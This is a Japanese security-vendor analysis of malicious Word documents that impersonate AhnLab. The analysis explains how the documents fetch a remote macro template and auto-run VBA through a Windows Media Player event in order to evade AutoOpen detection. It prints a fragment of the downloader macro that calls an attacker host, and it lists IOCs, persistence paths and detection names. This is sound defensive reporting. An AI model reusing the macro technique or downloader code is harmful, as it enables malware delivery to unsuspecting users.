MS Media Player を利用した不正な Word ドキュメント (AhnLab を詐称)

ASEC 分析チームは先週、「企業ユーザーをターゲットにした不正な Word ドキュメントが拡散中」で作成されたタイプの不正な Word ドキュメントが AhnLab を詐称する文章を含んで拡散していることを確認した。今回確認された Word ドキュメントは External リンクを通じて不正な VBA マクロが含まれた Word ドキュメントをダウンロードして実行する方式により動作する。もう一つの違いは、追加でダウンロードされた Word ドキュメントで不正な VBA マクロを自動で実行するために、従来の AutoOpen() 関数ではなく Windows Media Player() 関数を利用しているという点である。これは AutoOpen() 関数ベースのマクロ自動実行を検知するセキュリティ製品を回避するための試みと推定される。

確認されたドキュメントのファイル名は以下の通りである。

– NFT 分割.docx
– 202203_BTC_ETH_追加アカウント情報
– 類似受信行為告訴状.docx
– 類似受信告訴状.docx
– BTC_ETH自動売買アカウント情報.docx
– 暗号通貨_投資企画.docx

Word ドキュメントを開くと、内部の word\_rels\settings.xml.rels ファイルに存在する External URL を利用し、Word マクロ(dotm)ファイルをダウンロードして実行する。

図1.settings.xml.rels ファイルの中身
図2.ドキュメントを開いた際に External URL に接続を試みる画面

Extrenal URL を通じてダウンロードが正常に行われると、以下のようにマクロが含まれる。攻撃者はマクロの有効化を誘導するために、当社を詐称する画像と文章を挿入している。

図3.Word ドキュメントの内容

ユーザーがコンテンツの有効化ボタンをクリックすると、External URL を通じてダウンロードした Word ドキュメントに含まれる不正な VBA マクロが実行される。
このマクロは従来の Word ドキュメントで使用されていた AutoOpen() 関数の代わりに WindowsMediaPlayer1_OpenStateChange() 関数で作成されている。これは Windows Media Player オブジェクトの openState 属性が変更される際に実行される。この関数が実行されると、前回と同様に RunFE() 関数によって不正な振る舞いを実行する。以下は VBA マクロコードの一部である。

Private Function RunFE() As Long
    Dim MR As Object
    Dim bbb As String
    Dim i As Long
    Randomize
    Call Init
    For i = 0 To 8: bbb = bbb & Chr(Map1(Int(62 * Rnd()))): Next i
    Set MR = CreateObject(DecodeSTR("tw7v/v2UF6/h4I4v9cL5sgLww+yTE6+Dp9E=")) 'WinHttp.WinHttpRequest.5.1
    Call MR.SetTimeouts(0, 2000, 2000, 5000)
    #If Win64 Then
        MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCv9RJ4NXk") & "?" & bbb & "=" & bbb 'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm
    #Else
        MR.Open "GET", DecodeSTR("iBP1xrPPSNvg6tEO6/fczgngwOyJBO7f+YNJ9dPqiEjA9cSzSLHa/64myof9z1ftwMehLLDCutJJ4NXk") & "?" & bbb & "=" & bbb  'hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
    #End If
<省略>

Private Sub WindowsMediaPlayer1_OpenStateChange(ByVal NewState As Long)
    If bFlag = False Then
        Call CTD
        Dim rfRes As Long
        rfRes = RunFE()
        If rfRes = 1 Then
            bFlag = True
        End If
    End If
End Sub

External URL を通じてダウンロードされた Word ドキュメントを単独で実行すると Windows Media Player を確認することができる。ドキュメントの内部には以下のように名前が WindowsMediaPlayer1 となっている Windows Media Player が挿入されている。

図4.追加ダウンロードされた Word ドキュメントの内容

攻撃者は WindowsMediaPlayer1_OpenStateChange() 関数を自動で実行するために、この Player のオプションによりオートスタートを指定している。Player が実行されると VBA マクロ内の WindowsMediaPlayer1_OpenStateChange() が実行され、ユーザーが Player に対し追加のタスクを実行せずとも不正な振る舞いが実行される。結論として、攻撃者が Player を自動で開始するように設定したために、ユーザーがコンテンツの有効化ボタンをクリックすると自動的に不正なマクロが実行される。

図5.word\activeX\activeX1.xml ファイルの中身
図6.WindowsMediaPlayer1 のプロパティ

マクロコードにより実行される不正な振る舞いは、過去に共有した内容と同じである。ユーザー PC 環境に合わせてさらなるマルウェアをダウンロードしたあと、word プロセスにインジェクションして実行する。

ダウンロード URL
– X86 環境 : hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
– X64 環境 : hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm

その後 %ProgramData%\USOShared\Logs フォルダーに USOService.exe をドロップ、実行して HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WUService レジストリに登録し、このファイルが持続的に実行されるようにする。

図7.生成された実行ファイル

追加で確認された「유사수신행위 고소장.docx」の External URL からダウンロードした dotm ファイルの場合、マクロを有効化すると以下のようなメッセージボックスを生成する。この Word ドキュメントの場合、\AppData\Local\Microsoft\Office\ フォルダーに UpdateChecker.exe によって不正なファイルを生成する。これにより、攻撃者が %ProgramData% フォルダー以外にも様々なフォルダーにマルウェアをドロップすることがわかる。

図8.ダウンロード URL への接続に成功すると生成されるメッセージボックス
図9.ダウンロード URL への接続に失敗すると生成されるメッセージボックス

最近、Word ドキュメントを利用した攻撃が継続して確認されている。ユーザーのマクロ有効化を誘導するために当社を騙った事例が確認されるほど、マクロの有効化を誘導するための画像や本文内容が多様化しているため、ユーザーはマクロの使用に注意しなければならない。

現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。

[ファイル検知]
Downloader/DOC.Akdoor
Downloadaer/XML.Generic
Trojan/Win.Generic.C5025270

[IOC]
ce00749c908de017010055a83ac0654f
783e7c3ba39daa28301b841785794d76
2fec0c6ff8af4484471633aeaa1c9996
6df608342938f0d30a058c48bb9d8d4d
hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t32.acm
hxxp://ZVc1ijAU.naveicoipc[.]tech/ACMS/0lvNAK1t/0lvNAK1t64.acm
hxxp://naveicoipc[.]tech/ACMS/0nXbQs2e/topAccounts?uid=rt6i45sd
hxxp://naveicoipd[.]tech/ACMS/018ueCdS/blockchainTemplate
hxxp://bcvbert.naveicoipe[.]tech/ACMS/01AweT9Z/wwwTemplate?uid=glvrdta
hxxp://wrhehdfg.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate0330?vvvid=rehs4344s
hxxp://msldkopw.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate03301?vvvid=zxzdfherh
hxxp://uktyukb.naveicoipe[.]tech/ACMS/0TQyKdO9/accountTemplate03304?vvvid=cvnrturr
hxxp://gowelknx.naveicoipf[.]online/ACMS/07RRwrwK/securityTemplate0?securityID=ffsdwiefwe
hxxp://xjowihgnxcvb.naveicoipf[.]online/ACMS/07RRwrwK/securityTemplate3?securityID=cbvkoweoigwk

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:,

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments